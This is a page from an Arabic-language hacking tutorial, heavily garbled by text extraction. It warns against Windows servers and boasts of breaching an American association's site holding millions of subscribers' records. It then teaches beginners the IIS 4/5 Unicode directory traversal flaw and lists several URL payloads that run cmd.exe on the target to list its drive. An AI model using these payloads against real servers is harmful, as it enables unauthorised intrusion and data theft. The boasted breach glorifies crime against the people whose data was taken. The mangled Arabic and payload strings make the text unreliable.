Page 320 - بسم الله الرحمن الرحيم
P. 320
وهي نظا.م فاشل %80وثغراتصه بالالوف
ولانصح اي اخ لديه منتدي وموقع يستضيف سرفرات ويندوز را ح اقلكم ليش بااثبتات
صور 2هو صورة لجمعية امريكي مهم وحجم قاعدات البيانات 1.5كيك يعني 15000ميك ويحتوي علي
ختمسة ملين مشترك تصم اختتراقه البارحه بنفسي جهاري تصحميل الموقع لجاهزي كامل
1ثغرات الهتمل
2الفرونت بيج
3مخلفات الفتبي والستفاد منه كثير لهكرز
4ثغرات البرامج
6عد.م تصمكن حماية النظا.م %100
لذلك انصح الختوه بالبتعاد عن سرفرات الويندوز وبرامجهم
IISبداية نعرف ماهي
هي ختدمه متواجهدة في ويندوز الفين بروفشنال وويندوز ان تصي IISالـ
...IIS5.0وويندوز الفين يمتلك الصدارة الخامسة من ملقم معلومات النترنت
بسم ال نبدأ
تصوجهد نقطة ضعف في الي اي اس 4او 5وهذه النقطة تصستغل بطريقة سهلة جهد اً
وتصسمى هذه النقطة باليونيكود
وتصنفيذها سه لً ليحتاج الى ختبرة عميقة في مجال اختتراق المواقع
ولكن نقف عند هذه النقطة للمبتئيدئن
المبتدئين عام ًة يفكرون الن في اختتراق عدة مواقع شهيرة بهذه الطريقة
ولكن ل هذه الطريقة غير مجدية مع المواقع الشهيرة او غير الشهيرة
لن نقطة الضعف هذه لتصوجهد ال في ويندوز الفين او ان تصي
وأغلب المواقع الشهيرة تصستخد.م انظمة اليونكس واللنكس
أي ان ويندوز ان تصي او الفين نظا.م حمايته محدودة وكل يو.م تصطلع ثغرات جهديدة
لكن بوسع مدراء المواقع ايقاف نقطة ضعف من نقاط الضعاف الموجهودة في الن تصي
لكن بتلك الطريقة قد يكونون جهعلو حاجهز اً لهم من الهكرة
ولكن ليس دائم ًا
وتصنفذ من داختل المتصفح
وطريقة تصنفيذ الثغرة كالتصي :
\:http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c
ركزو هنا الن بعد دوت كو.م بدأت تصنفيذ الثغرة
وبإمكانك أيضا دختول اي ملف وليس فقط رؤية السي :cهذه الثغرة تصسمح لك بــ عرض جهميع ملفات
وتصوجهد أكثر من ثغرة وهي
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
320
